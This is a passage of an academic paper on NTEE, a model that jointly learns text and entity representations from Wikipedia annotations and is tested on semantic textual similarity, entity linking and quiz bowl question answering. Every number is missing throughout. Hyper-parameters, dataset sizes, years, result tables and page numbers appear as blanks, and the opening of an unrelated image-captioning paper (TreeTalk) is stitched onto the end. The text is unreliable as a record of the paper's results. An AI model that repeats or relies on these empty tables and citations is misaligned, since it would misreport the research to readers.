mentions cannot be observed as annotations in wikipedia. therefore, we use the aforementioned heuristic method to address this problem. . other details our model has several hyper-parameters. following kenter et al. ( ), the number of dimensions we used was d = . the mini-batch size was fixed at , the size of negative samples k was set to , and the training consisted of one epoch. the model was implemented using python and theano (theano development team, ). the training took approximately six days using a nvidia k gpu. we trained the model using stochastic gradient descent (sgd) and its learning rate was controlled by rmsprop (tieleman and hin- ton, ). the corpus also includes annotations that are generated us- ing heuristics. we did not use these pseudo-annotations and used only the entity annotations that were created by wikipedia contributors. experiments in order to evaluate our model presented in the previ- ous section, we conduct experiments on three impor- tant nlp tasks using the representations learned by our model. first, we conduct an experiment on a se- mantic textual similarity task in order to evaluate the quality of the learned text representations. next, we conduct experiments on two important nlp prob- lems (i.e., el and factoid qa) in order to test the effectiveness of our proposed representations as fea- tures for downstream nlp tasks. finally, we further qualitatively analyze the learned representations. note that we separately describe how we ad- dress each task using our representations in the sub- section of each experiment. . semantic textual similarity semantic textual similarity aims to test how well a model reflects human judgments of the semantic similarity between two sentence pairs. the task has been used as a standard method to evaluate the qual- ity of distributed representations of sentences in past work (kiros et al., ; hill et al., a; kenter et al., ). . . setup our experimental setup follows that of a previ- ously published experiment (hill et al., a). we use two standard datasets: ( ) the sts dataset (agirre et al., ) consisting of , sentence pairs and human ratings from six different sources (e.g., newswire, web forums, dictionary glosses), and ( ) the sick dataset (marelli et al., ) con- sisting of , pairs of sentences and human rat- ings. in both datasets, the ratings take values be- tween and , where a rating of indicates that the sentence pair is not related, and a rating of means that they are highly related. all sentence pairs ex- cept the sick trial pairs were used for our ex- periments. we train our model by experimenting with both paragraphs and sentences. further, we introduce another training setting (denoted by fixed ntee), where the parameters in the word representations and the entity representations are fixed throughout the training. we compute the cosine distance between the vec- tors of the two sentences in each sentence pair (de- rived using eq. ( )) and measure the pearson’s r and spearman’s p correlations between these distances and the gold-standard human ratings. additionally, we use pearson’s r as our primal score. . . baselines for baselines for this experiment, we selected the following four recent state-of-the-art models. brief descriptions of these models are as follows: • word vec (mikolov et al., a; mikolov et al., b) is a popular word embedding model. we compute a sentence representation by element-wise addition of the vectors of its words (mitchell and lapata, ). we add its skip-gram and cbow models to our baselines. we train the model with the hyper-parameters and the wikipedia corpus explained in sec- tion . . thus, the skip-gram model is equiv- alent to the pre-trained representations used in our model. furthermore, in order to conduct a fair comparison between the skip-gram model and our model, we also add skip-gram (plain), which is a skip-gram model trained using a different corpus. in particular, the corpus is augmented using the texts in dbpedia abstract corpus , and its entity annotations are treated as regular text phrases (not replaced to their unique identifiers). • skip-thought (kiros et al., ) is a model that is trained to predict adjacent sentences given each sentence in a corpus. sentences are encoded using a recurrent neural network (rnn) with gated recurrent units (gru). • siamese cbow (kenter et al., ) is a model that aims to predict sentences occurring next to each other in a corpus. a sentence rep- resentation is derived using a vector average of words in the sentence. we obtain a score of a sentence pair by using the cosine distance between the sentence represen- tations of the pair. name sts sick news forum onwn twitter images headlines ntee (sentence) . /. . /. . /. . /. . /. . /. . /. ntee (paragraph) . /. . /. . /. . /. . /. . /. . /. fixed ntee (sentence) . /. . /. . /. . /. . /. . /. . /. fixed ntee (paragraph) . /. . /. . /. . /. . /. . /. . /. skip-gram . /. . /. . /. . /. . /. . /. . /. skip-gram (plain) . /. . /. . /. . /. . /. . /. . /. cbow . /. . /. . /. . /. . /. . /. . /. skip-thought . /. . /. . /. . /. . /. . /. . /. siamese cbow . /. . /. . /. . /. . /. . /. - table : pearson’s r and spearman’s p correlations of our models with the state-of-the-art models on semantic textual similarity task. best scores, in terms of r, are marked in bold. . . results table shows our experimental results with the baseline methods. we obtained the scores of skip-thought from hill et al. ( a) and those of siamese cbow from kenter et al. ( ). our ntee models were able to outperform the state-of-the-art models in all datasets in terms of pearson’s r. moreover, our fixed ntee models outperformed the ntee models in several datasets and the skip-gram models in all datasets. further, our model trained with sentences consistently out- performed the model trained with paragraphs. ad- ditionally, the skip-gram models performed mostly similarly regardless of the difference of their corpus. note that, because we fix the word representations and the entity representations during the training of the fixed ntee models, the difference between the fixed ntee models and the skip-gram model is merely the presence of the learned fully connected layer. because our model places a text representa- tion and the representations of its relevant entities close to each other, the function of the layer can be recognized as an affine transformation from the word-based text representation to the entity-based text representation. we consider that the reason why the fixed ntee model performed well among datasets is that the entity-based text representations are more semantic (less syntactic) and contain less noise than the word-based text representations, thus are much more suitable for addressing this task. we augment the corpus simply by appending the texts in dbpedia abstract corpus to the wikipedia corpus. . entity linking entity linking (el) (cucerzan, ; mihalcea and csomai, ; milne and witten, ; ratinov et al., ; hajishirzi et al., ; ling et al., ) is the task of resolving ambiguous mentions of enti- ties to their referent entities in kb. el has recently received considerable attention because of its effec- tiveness in various nlp tasks such as information extraction and semantic search. the task is chal- lenging because of the ambiguity in the meaning of entity mentions (e.g., “washington” can refer to the state, the capital of the us, the first us president george washington, and so forth). the key to improve the performance of el is to accurately model the semantic context of entity mentions. because our model learns the likelihood of an entity appearance in a given text, it can natu- rally be used for modeling the context of el. . . setup our experimental setup follows the setup de- scribed in past work (chisholm and hachey, ; he et al., ; yamada et al., ). we use two standard datasets: the conll dataset and the tac dataset. the conll dataset, which was pro- posed in hoffart et al. ( ), includes training, de- velopment, and test sets consisting of , , and documents, respectively. we use the training set to train our el method, and the test set for measur- ing the performance of our method. we report the standard micro- (aggregates over all mentions) and macro- (aggregates over all documents) accuracies of the top-ranked candidate entities. the tac dataset is another dataset con- structed for the text analysis conference (tac) (ji et al., ). the dataset comprises training and test sets containing , and , documents, re- spectively. we use mentions only with a valid entry in the kb, and report the micro-accuracy score of the top-ranked candidate entities. we evaluate our method on , mentions contained in the test set. further, we randomly select % of the documents from the training set, and use these documents as a development set. additionally, we collected two measures that have frequently been used in past el work: entity popu- larity and prior probability. the entity popularity of an entity e is defined as log(|ae,∗| + ), where ae,∗ is the set of kb anchors that point to e. the prior probability of mention m referring to entity e is defined as |ae,m|/|a∗,m|, where a∗,m repre- sents all kb anchors with the same surface as m, and ae,m is a subset of a∗,m that points to e. these two measures were collected directly from the same wikipedia dump described in section . . . . our method following past work, we address the el task by solving two sub-tasks: candidate generation and mention disambiguation. candidate generation in candidate generation, candidates of referent entities are generated for each mention. we use the candidate generation method proposed in yamada et al. ( ) for the sake of compatibility with their state-of-the-art results. in particular, we use a public dataset proposed in per- shina et al. ( ) for the conll dataset. for the tac dataset, we use a dictionary that is di- rectly built from the wikipedia dump explained in section . . we retrieved possible mention surfaces of an entity from ( ) the title of the entity, ( ) the ti- tle of another entity redirecting to the entity, and ( ) the names of anchors that point to the entity. fur- thermore, to improve the recall, we also tokenize the title of each entity and treat resulted tokens as pos- sible mention surfaces of the corresponding entity. we sort the entity candidates according to their en- tity popularities, and retain the top candidates for computational efficiency. the recall of the can- http://www.nist.gov/tac/ didate generation was . % and . % on the test sets of the conll and tac datasets, respec- tively. mention disambiguation we address the men- tion disambiguation task using a multi-layer percep- tron (mlp) with a single hidden layer. figure shows the architecture of our neural network model. the model selects an entity from among the entity candidates for each mention m in a document t. for each entity candidate e, we input the vector of the entity ve , the vector of the document vt (computed with eq. ( )), the dot product of ve and vt , , and the small number of features for el described below. on top of these features, we stack a hidden layer with nonlinearity using rectified linear units (relu) and dropout. we also add an output layer onto the hidden layer and select the most relevant entity using softmax over the entity candidates. similar to past work (chisholm and hachey, ; yamada et al., ), we include a small num- ber of features in our model. first, we use the fol- lowing three standard el features: the entity popu- larity of e, the prior probability of m referring to e, and the maximum prior probability of e of all men- tions in t. in addition, we optionally add features representing string similarities between the title of e and the surface of m (meij et al., ; yamada et al., ). these similarities include whether the title of e exactly equals or contains the surface of m, and whether the title of e starts or ends with the surface of m. we tuned the following two hyper-parameters us- ing the micro-accuracy on the development set of each dataset: the number of units in the hidden layer and the dropout probability. the results are listed in table . further, we trained the model by using stochastic gradient descent (sgd). the learning rate was con- trolled by rmsprop, and the mini-batch size was set to . we also used the micro-accuracy on the de- velopment set to locate the best epoch for testing. we normalized ve to unit length because of its overall higher accuracy. note that, the dot product represents the unnormalized like- lihood that e appears in t (see eq.( )). we also tested using the cosine similarity rather than the dot product, but it slightly degraded the performance in the el task and the factoid qa task described below. figure : architecture of our neural network for el and qa tasks. we tested the ntee model and the fixed ntee model to initialize the parameters of representations vt and ve. furthermore, we also tested two simple methods using the pre-trained representations (i.e., skip-gram). the first method is that the representa- tions of words and entities are initialized using the pre-trained representations presented in section . , and the other parameters are initialized randomly (denoted by sg-proj). the second method is the same method as in sg-proj except the training cor- pus of the pre-trained representations is augmented using the dbpedia abstract corpus (denoted by sg- proj-dbp). regarding the ntee and the fixed ntee models, sentences (rather than paragraphs) were used to train the proposed representations because of the superior performance of this approach on both the conll and tac datasets. further, we did not update our representations of words (vw) and entities (ve) in the training of our el method, because updat- ing them did not generally improve the performance. additionally, we used a vector filled with zeros as representations of entities that were not contained in our vocabulary. . . baselines we adopt the following six recent state-of-the-art el methods as our baselines: • hoffart (hoffart et al., ) used a graph- based approach that finds a dense subgraph of entities in a document to address el. we augmented the corpus by simply concatenating the wikipedia corpus and the dbpedia abstract corpus. similar to the wikipedia corpus, we replaced each entity annotation in the dbpedia abstract corpus by its unique identifier of the entity referred by the annotation. dataset hidden units dropout el: conll (ntee) , . conll (ntee w/o strsim) , . conll (fixed ntee) , . conll (sg-proj) , . conll (sg-proj-dbp) , . tac (ntee) , . tac (ntee w/o strsim) , . tac (fixed ntee) , . tac (sg-proj) , . tac (sg-proj-dbp) , . factoid qa: history (ntee) , . history (fixed ntee) , . history (sg-proj) , . history (sg-proj-dbp) , . literature (ntee) , . literature (fixed ntee) , . literature (sg-proj) , . literature (sg-proj-dbp) , . table : hyper-parameters used for el and qa tasks. hidden units is the number of units in the hidden layers, and dropout is the dropout probability. • he (he et al., ) proposed a method for learning the representations of mention con- texts and entities from kb using the stacked de- noising auto-encoders. these representations were then used to address el. • chisholm (chisholm and hachey, ) used a support vector machine (svm) with vari- ous features derived from kb and a wikilinks dataset (singh et al., ). • pershina (pershina et al., ) improved el by modeling coherence using the personalized page rank algorithm. • globerson (globerson et al., ) improved the coherence model for el by introducing an attention mechanism in order to focus only on strong relations of entities. • yamada (yamada et al., ) proposed a model for learning the joint distributed repre- sentations of words and kb entities from kb, and addressed el using context models based on the representations. . . results table compares the results of our method with those obtained with the state-of-the-art methods. our method achieved strong results on both the conll and the tac datasets. in particular, the ntee model clearly outperformed the other pro- posed models. we also tested the performance of the ntee model without using the string similarity features (strsim) and found that these features also contributed to the performance. furthermore, our method successfully outper- formed all the recent strong state-of-the-art methods on both datasets. this is remarkable because most state-of-the-art el methods, including all baseline methods except that of he, adopt global approaches, where all entity mentions in a document are simul- taneously disambiguated based on coherence among disambiguation decisions. our method depends only on the local (or textual) context available in the target document. thus, the performance can likely be improved further by combining a global model with our local model as frequently observed in past work (ratinov et al., ; chisholm and hachey, ; yamada et al., ). we also conducted a brief error analysis using the ntee model and the test set of the conll dataset by randomly inspecting errors. as a result, % of the errors were mentions of which the referent entities were not contained in our vocabulary. in this case, our method could not incorporate any con- textual information, thus likely resulting in disam- biguation errors. the other major types of errors were the mentions of location names. the dataset contains many location names (e.g., japan) referring conll (micro) conll (macro) tac (micro) ntee . . . ntee (w/o strsim) . . . fixed ntee . . . sg-proj . . . sg-proj-dbp . . . hoffart ( ) . . - he ( ) . . . chisholm ( ) . - . pershina ( ) . . - globerson ( ) . - . yamada ( ) . . . table : accuracies of the proposed method and the state-of-the-art methods. to sports team entities (e.g., japan national football team). it appeared that our method neglected to dis- tinguish whether a location name refers to the loca- tion itself or a sports team. in particular, our method often wrongly resolved these mentions referring to sports team entities into the corresponding location entities and vice versa. they accounted for . % and . % out of the total number of errors, respec- tively. moreover, we observed several difficult cases such as selecting hindu instead of hindu national- ism, christian instead of catholicism, new york city instead of new york, and so forth. . factoid question answering question answering (qa) has been one of the cen- tral problems in nlp research for the last few decades. factoid qa is one of the typical types of qa that aims to predict an entity (e.g., events, au- thors, and actors) that is discussed in a given ques- tion. quiz bowl is a popular trivia quiz game in which players are asked questions consisting of – sentence questions describing entities. the dataset of the quiz bowl has been frequently used for evalu- ating factoid qa methods in recent literature on qa (iyyer et al., ; iyyer et al., ; xu and li, ). in this section, we demonstrate that our proposed representations can be effectively used as back- ground knowledge for the qa task. . . setup we followed an existing method (xu and li, ) for our experimental setup. we used the public quiz bowl dataset proposed in iyyer et al. ( ). following past work (iyyer et al., ; iyyer et al., ; xu and li, ), we only used questions belonging to the history and literature cat- egories, and only used answers that appeared at least six times. for questions referring to the same an- swer, we sampled % of each for the development set and test sets, and the remaining % for the train- ing set. as a result, we obtained , training, development, and test questions for history, and , training, development, and test ques- tions for literature. the number of possible answers was and in the history and literature cate- gories, respectively. . . our method following past work (iyyer et al., ; iyyer et al., ; xu and li, ), we address this task as a classification problem that selects the most rele- vant answer from the possible answers observed in the dataset. we adopt the same neural network ar- chitecture described in section . . (see figure ). we use the following three features: the vector of the entity ve , the vector of the question vt (com- puted using eq. ( )), and the dot product of ve and vt. note that we do not include other features in this task. the hyper-parameters used in our model (i.e., the number of units in the hidden layer and the dropout probability) are shown in table . we tuned these parameters using the development set of each dataset. unlike the el task, we updated all parameters including representations of words and entities for training our qa method. we used stochastic gra- dient descent (sgd) to train the model. the mini- batch size was fixed at , and the learning rate was controlled by rmsprop. we used the accuracy the dataset was downloaded from https://cs.umd. edu/˜miyyer/qblearn/. note that the public dataset is significantly smaller than the one used in past work (iyyer et al., ; iyyer et al., ) because they also used a proprietary dataset in addition to the public dataset. similar to our el method, we also normalize ve to unit length because of its overall higher accuracy. on the development set of each dataset to detect the best epoch. similar to the el task, we tested the four models to initialize the representations vt and ve, i.e., the ntee, the fixed ntee, the sg-proj, and the sg- proj-dbp models. further, the representations of the ntee model and the fixed ntee model were those that were trained with the sentences because of their overall superior accuracy compared to those trained with paragraphs. . . baselines we use two types of baselines: two conventional bag-of-words (bow) models and two state-of-the- art neural network models. the details of these mod- els are as follows: • bow (iyyer et al., ) is a conventional ap- proach using a logistic regression (lr) classi- fier trained with binary bow features to pre- dict the correct answer. • bow-dt (iyyer et al., ) is based on the bow baseline augmented with the feature set with dependency relation indicators. • qanta (iyyer et al., ) is an approach based on a recursive neural network to de- rive the distributed representations of ques- tions. the method also uses the lr classifier with the derived representations as features. • fts-brnn (xu and li, ) is based on the bidirectional recurrent neural network (rnn) with gated recurrent units (gru). similar to qanta, the method adopts the lr classifier with the derived representations as features. . . results table shows the results of our methods com- pared with those of the baseline methods. the re- sults of bow, bow-dt, and qanta were obtained from xu and li ( ). we also include the result reported in iyyer et al. ( ) (denoted by qanta- full), which used a significantly larger dataset than ours for training and testing. the experimental results show that our ntee model achieved the best performance compared to the other proposed models and all the baseline meth- ods on both the history and the literature datasets. name history literature ntee . . fixed ntee . . sg-proj . . sg-proj-dbp . . bow . . bow-dt . . qanta . . qanta-full . . fts-brnn . . table : accuracies of the proposed method and the state-of-the-art methods for the factoid qa task. in particular, despite the simplicity of the neural network architecture of our method compared to the state-of-the-art methods (i.e., qanta and fts- brnn), our method clearly outperformed these methods. this demonstrates the effectiveness of our proposed representations as background knowledge for the qa task. we also conducted a brief error analysis using the test set of the history dataset. our observations in- dicated that our method mostly performed perfect in terms of predicting the types of target answers (e.g., locations, events, and people). however, our method erred in delicate cases such as predicting henry ii of england instead of henry i of england, and syra- cuse, sicily instead of sicily. . qualitative analysis in order to investigate what happens inside our model, we conducted a qualitative analysis using our proposed representations trained with sentences. we first inspected the word representations of our model and our pre-trained representations (i.e., the skip-gram model) by computing the top five similar words of five words (i.e., her, dry, spanish, tennis, moon) using cosine similarity. the results are pre- sented in table . interestingly, our model is some- what more specific than the skip-gram model. for example, there is only one word she whose cosine similarity to the word her is more than . in our model, whereas all the corresponding similar words in the skip-gram model (i.e., she, his, herself, him, and mother) satisfy that condition. we observe a similar trend for the similar words of dry. further- more, all the words similar to tennis are strictly re- lated to the sport itself in our model, whereas the corresponding similar words of the skip-gram model contain broader words such as ball sports (e.g., bad- minton and volleyball). a similar trend can be ob- served for the similar words of spanish and moon. similarly, we also compared our entity represen- tations with those of the pre-trained representations by computing the top five similar entities of six en- tities (i.e., europe, golf, tea, smartphone, scarlett johansson, and the lord of the rings) with respect to cosine similarity. table contains the results. for the entities europe and golf, we observe similar trends to our word representations. particularly, in our model, the most similar entities of europe and golf are eastern europe and golf course, respec- tively, whereas those of the skip-gram model are asia and tennis, respectively. however, the simi- lar entities of most entities (e.g., tea, smartphone, scarlett johansson and the lord of the rings) ap- pear to be similar between our model and the skip- gram model. related work various neural network models that learn distributed representations of arbitrary-length texts (e.g., para- graphs and sentences) have recently been proposed. these models aimed to produce general-purpose text representations that can be used with ease in vari- ous downstream nlp tasks. although most of these models learn text representations from an unstruc- tured text corpus (le and mikolov, ; kiros et al., ; kenter et al., ), there have also been proposed models that learn text representations by leveraging structured linguistic resources. for in- stance, wieting et al. ( ) trained their model us- ing a large number of noisy phrase pairs retrieved from the paraphrase database (ppdb) (ganitkevitch et al., ). hill et al. ( b) use several public dictionaries to train the model by mapping defini- tion texts in a dictionary to representations of the words explained by these texts. to our knowledge, our work is the first work to learn generic text repre- sentations with the supervision of entity annotations. several methods have also been proposed for ex- tending the word embedding methods. for example, levy and goldberg ( ) proposed a method to train word embedding with dependency-based con- word our model skip-gram her she ( . ) to ( . ) and ( . ) his ( . ) in ( . ) she ( . ) his ( . ) herself ( . ) him ( . ) mother ( . ) dry wet ( . ) arid ( . ) moisture ( . ) grows ( . ) dried ( . ) wet ( . ) moist ( . ) drier ( . ) drying ( . ) moister ( . ) tennis doubles ( . ) atp ( . ) wimbledon ( . ) wta ( . ) slam ( . ) badminton ( . ) hardcourt ( . ) volleyball ( . ) racquetball ( . ) squash ( . ) spanish spain ( . ) madrid ( . ) andalusia ( . ) valencia ( . ) seville ( . ) spain ( . ) portuguese ( . ) french ( . ) catalan ( . ) mexican ( . ) moon lunar ( . ) crater ( . ) rim ( . ) craters ( . ) midpoint ( . ) lunar ( . ) moons ( . ) sun ( . ) earth ( . ) sadasaa ( . ) table : examples of top five similar words with their co- sine similarities in our learned word representations com- pared with those of the skip-gram model. texts, and luan et al. ( ) used semantic role la- beling for generating contexts to train word embed- ding. moreover, a few recent studies on learning en- tity embedding based on word embedding methods have been reported (hu et al., ; li et al., ). these models are typically based on the skip-gram model and directly model the semantic relatedness between kb entities. our work differs from these studies because we aim to learn representations of arbitrary-length texts in addition to entities. another related approach is the relational em- bedding (or knowledge embedding) (bordes et al., ; wang et al., ; lin et al., ), which en- codes entities as continuous vectors and relations as some operations on the vector space, such as vector addition. these models typically learn representa- tions from large kb graphs consisting of entities and relations. similarly, the universal schema (riedel et al., ; toutanova et al., ; verga et al., ) jointly learned continuous representations of kb re- lations, entities, and surface text patterns for the re- lation extraction task. finally, yamada et al. ( ) recently proposed a method to jointly learn the embeddings of words and entities from wikipedia using the skip-gram model and applied it to el. our method differs from their method in that their method does not directly model arbitrary-length texts (i.e., paragraphs and sentences), which we proved to be highly effective for various tasks in this paper. moreover, we also showed that the joint embedding of texts and enti- ties can be applied not only to el but also for wider applications such as semantic textual similarity and factoid qa. conclusions in this paper, we presented a novel model capable of jointly learning distributed representations of texts and entities from a large number of entity annota- tions in wikipedia. our aim was to construct the proposed general-purpose model such that it enables practitioners to address various nlp tasks with ease. we achieved state-of-the-art results on three impor- tant nlp tasks (i.e., semantic textual similarity, en- tity linking, and factoid question answering), which clearly demonstrated the effectiveness of our model. furthermore, the qualitative analysis showed that the characteristics of our learned representations appar- ently differ from those of the conventional word em- bedding model (i.e., the skip-gram model), which we plan to investigate in more detail in the future. moreover, we make our code and trained models publicly available for future research. future work includes analyzing our model more extensively and exploring the effectiveness of our model in terms of other nlp tasks. we also aim to test more expressive neural network models (e.g., lstm) to derive our text representations. further- more, we believe that one of the promising direc- tions would be to incorporate the rich structural data of the kb such as relationships between entities, links between entities, and the hierarchical category structure of entities. entity our model skip-gram europe eastern europe ( . ) western europe ( . ) central europe ( . ) asia ( . ) north america ( . ) asia ( . ) western europe ( . ) north america ( . ) central europe ( . ) americas ( . ) golf golf course ( . ) pga tour ( . ) lpga ( . ) professional golfer ( . ) u.s. open ( . ) tennis ( . ) lpga ( . ) pga tour ( . ) golf course ( . ) nicklaus design ( . ) tea coffee ( . ) green tea ( . ) black tea ( . ) camellia sinensis ( . ) spice ( . ) coffee ( . ) green tea ( . ) black tea ( . ) camellia sinensis ( . ) spice ( . ) smartphone tablet computer ( . ) mobile device ( . ) personal digital assistant ( . ) android (operating system) ( . ) iphone ( . ) tablet computer ( . ) personal digital assistant ( . ) mobile device ( . ) android (operating system) ( . ) feature phone ( . ) scarlett johansson kirsten dunst ( . ) anne hathaway ( . ) cameron diaz ( . ) natalie portman ( . ) jessica biel ( . ) anne hathaway ( . ) natalie portman ( . ) kirsten dunst ( . ) cameron diaz ( . ) kate beckinsale ( . ) the lord of the rings the hobbit ( . ) j. r. r. tolkien ( . ) the silmarillion ( . ) the fellowship of the ring ( . ) the lord of the rings (film series) ( . ) the hobbit ( . ) j. r. r. tolkien ( . ) the silmarillion ( . ) the fellowship of the ring ( . ) elvish languages ( . ) table : examples of top five similar entities with their cosine similarities in our learned entity representations with those of the skip-gram model. acknowledgements we would like to thank the tacl editor kristina toutanova and the anonymous reviewers for helpful comments on an earlier draft of this paper. references eneko agirre, carmen banea, claire cardie, daniel cer, mona diab, aitor gonzalez-agirre, weiwei guo, rada mihalcea, german rigau, and janyce wiebe. . semeval- task : multilingual seman- tic textual similarity. in proceedings of the th in- ternational workshop on semantic evaluation, pages – . antoine bordes, nicolas usunier, alberto garcia-duran, jason weston, and oksana yakhnenko. . translating embeddings for modeling multi-relational data. in advances in neural information processing systems , pages – . martin brümmer, milan dojchinovski, and sebastian hellmann. . dbpedia abstracts: a large-scale, open, multilingual nlp training corpus. in proceed- ings of the tenth international conference on lan- guage resources and evaluation. andrew chisholm and ben hachey. . entity dis- ambiguation with web links. transactions of the as- sociation for computational linguistics, : – . silviu cucerzan. . large-scale named entity dis- ambiguation based on wikipedia data. in proceed- ings of the joint conference on empirical meth- ods in natural language processing and computa- tional natural language learning, pages – . wei fang, jianwen zhang, dilin wang, zheng chen, and ming li. . entity disambiguation by knowledge and text jointly embedding. in proceedings of the th signll conference on computational natural language learning, pages – . evgeniy gabrilovich and shaul markovitch. . com- puting semantic relatedness using wikipedia-based explicit semantic analysis. in international joint conference on artificial intelligence, pages – . juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – . amir globerson, nevena lazic, soumen chakrabarti, amarnag subramanya, michael ringaard, and fer- nando pereira. . collective entity resolution with multi-focal attention. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – . hannaneh hajishirzi, leila zilles, daniel s weld, and luke zettlemoyer. . joint coreference res- olution and named-entity linking with multi-pass sieves. in proceedings of the conference on empirical methods in natural language processing, pages – . zhengyan he, shujie liu, mu li, ming zhou, longkai zhang, and houfeng wang. . learning entity representation for entity disambiguation. in pro- ceedings of the st annual meeting of the associa- tion for computational linguistics (volume : short papers), pages – . felix hill, kyunghyun cho, and anna korhonen. a. learning distributed representations of sentences from unlabelled data. in proceedings of the conference of the north american chapter of the as- sociation for computational linguistics: human lan- guage technologies, pages – . felix hill, kyunghyun cho, anna korhonen, and yoshua bengio. b. learning to understand phrases by embedding the dictionary. transactions of the asso- ciation for computational linguistics, : – . johannes hoffart, mohamed amir yosef, ilaria bordino, hagen fürstenau, manfred pinkal, marc spaniol, bilyana taneva, stefan thater, and gerhard weikum. . robust disambiguation of named entities in text. in proceedings of the conference on empirical methods in natural language processing, pages – . zhiting hu, poyao huang, yuntian deng, yingkai gao, and eric xing. . entity hierarchy embedding. in proceedings of the rd annual meeting of the associ- ation for computational linguistics and the th inter- national joint conference on natural language pro- cessing (volume : long papers), pages – . mohit iyyer, jordan boyd-graber, leonardo claudino, richard socher, and hal daumé iii. . a neural network for factoid question answering over para- graphs. in proceedings of the conference on empirical methods in natural language processing, pages – . mohit iyyer, varun manjunatha, jordan boyd-graber, and hal daumé iii. . deep unordered com- position rivals syntactic methods for text classifica- tion. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – . heng ji, ralph grishman, hoa trang dang, kira grif- fitt, and joe ellis. . overview of the tac knowledge base population track. in proceeding of text analytics conference. tom kenter, alexey borisov, and maarten de rijke. . siamese cbow: optimizing word embed- dings for sentence representations. in proceedings of the th annual meeting of the association for com- putational linguistics (volume : long papers), pages – . ryan kiros, yukun zhu, ruslan r salakhutdinov, richard zemel, raquel urtasun, antonio torralba, and sanja fidler. . skip-thought vectors. in ad- vances in neural information processing systems , pages – . quoc v. le and tomas mikolov. . distributed rep- resentations of sentences and documents. in proceed- ings of the st international conference on machine learning (volume ), pages – . omer levy and yoav goldberg. . dependency- based word embeddings. in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers), pages – . jiwei li, thang luong, and dan jurafsky. . a hierarchical neural autoencoder for paragraphs and documents. in proceedings of the rd annual meet- ing of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – . yuezhang li, ronghuo zheng, tian tian, zhiting hu, rahul iyer, and katia sycara. . joint embed- ding of hierarchical categories and entities for con- cept categorization and dataless classification. in proceedings of the th international conference on computational linguistics, pages – . yankai lin, zhiyuan liu, maosong sun, yang liu, and xuan zhu. . learning entity and relation em- beddings for knowledge graph completion. in pro- ceedings of the th aaai conference on artificial in- telligence, pages – . xiao ling, sameer singh, and daniel s. weld. . design challenges for entity linking. transactions of the association for computational linguistics, : – . yi luan, yangfeng ji, hannaneh hajishirzi, and boyang li. . multiplicative representations for unsuper- vised semantic role induction. in proceedings of the th annual meeting of the association for compu- tational linguistics (volume : short papers), pages – . marco marelli, stefano menini, marco baroni, luisa bentivogli, raffaella bernardi, and roberto zampar- elli. . a sick cure for the evaluation of compo- sitional distributional semantic models. in proceed- ings of the ninth international conference on lan- guage resources and evaluation, pages – . edgar meij, wouter weerkamp, and maarten de rijke. . adding semantics to microblog posts. in pro- ceedings of the fifth acm international conference on web search and data mining, pages – . rada mihalcea and andras csomai. . wikify!: linking documents to encyclopedic knowledge. in proceedings of the sixteenth acm conference on in- formation and knowledge management, pages – . tomas mikolov, greg corrado, kai chen, and jeffrey dean. a. efficient estimation of word repre- sentations in vector space. in proceedings of the in- ternational conference on learning representations, pages – . tomas mikolov, ilya sutskever, kai chen, greg s. cor- rado, and jeff dean. b. distributed represen- tations of words and phrases and their composition- ality. in advances in neural information processing systems , pages – . david milne and ian h. witten. . learning to link with wikipedia. in proceeding of the th acm con- ference on information and knowledge management, pages – . jeff mitchell and mirella lapata. . vector-based models of semantic composition. in proceedings of acl- : hlt, pages – . jeffrey pennington, richard socher, and christopher d manning. . glove: global vectors for word representation. in proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – . maria pershina, yifan he, and ralph grishman. . personalized page rank for named entity disam- biguation. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – . lev ratinov, dan roth, doug downey, and mike an- derson. . local and global algorithms for dis- ambiguation to wikipedia. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies, pages – . sebastian riedel, limin yao, andrew mccallum, and benjamin m marlin. . relation extraction with matrix factorization and universal schemas. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – . sameer singh, amarnag subramanya, fernando pereira, and andrew mccallum. . wikilinks: a large- scale cross-document coreference corpus labeled via links to wikipedia. technical report um-cs- - . theano development team. . theano: a python framework for fast computation of mathematical ex- pressions. arxiv preprint arxiv: . v . tijmen tieleman and geoffrey hinton. . lecture . - rmsprop, coursera: neural networks for machine learning. technical report. kristina toutanova, danqi chen, patrick pantel, hoifung poon, pallavi choudhury, and michael gamon. . representing text for joint embedding of text and knowledge bases. in proceedings of the con- ference on empirical methods in natural language processing, pages – . patrick verga, david belanger, emma strubell, ben- jamin roth, and andrew mccallum. . multi- lingual relation extraction using compositional uni- versal schema. in proceedings of the confer- ence of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – . zhen wang, jianwen zhang, jianlin feng, and zheng chen. . knowledge graph and text jointly em- bedding. in proceedings of the conference on empirical methods in natural language processing, pages – . john wieting, mohit bansal, kevin gimpel, and karen livescu. . towards universal paraphrastic sen- tence embeddings. in proceedings of the inter- national conference on learning representations. dong xu and wu-jun li. . full-time supervi- sion based bidirectional rnn for factoid question answering. arxiv preprint arxiv: . v . ikuya yamada, hiroyuki shindo, hideaki takeda, and yoshiyasu takefuji. . joint learning of the em- bedding of words and entities for named entity dis- ambiguation. in proceedings of the th signll con- ference on computational natural language learn- ing, pages – . treetalk: composition and compression of trees for image descriptions polina kuznetsova† † stony brook university stony brook, ny pkuznetsova @cs.stonybrook.edu vicente ordonez‡ tamara l. berg‡ ‡ unc chapel hill chapel hill, nc {vicente,tlberg} @cs.unc.edu yejin choi†† ††university of washington seattle, wa yejin@cs.washington.edu abstract we present a new tree based approach to composing expressive image descriptions that makes use of naturally occuring web images with captions. we investigate two related tasks: image caption generalization and gen- eration, where the former is an optional sub- task of the latter. the high-level idea of our approach is to harvest expressive phrases (as tree fragments) from existing image descrip- tions, then to compose a new description by selectively combining the extracted (and op- tionally pruned) tree fragments. key algo- rithmic components are tree composition and compression, both integrating tree structure with sequence structure. our proposed system attains significantly better performance than previous approaches for both image caption generalization and generation. in addition, our work is the first to show the empirical ben- efit of automatically generalized captions for composing natural image descriptions. introduction the web is increasingly visual, with hundreds of bil- lions of user contributed photographs hosted online. a substantial portion of these images have some sort of accompanying text, ranging from keywords, to free text on web pages, to textual descriptions di- rectly describing 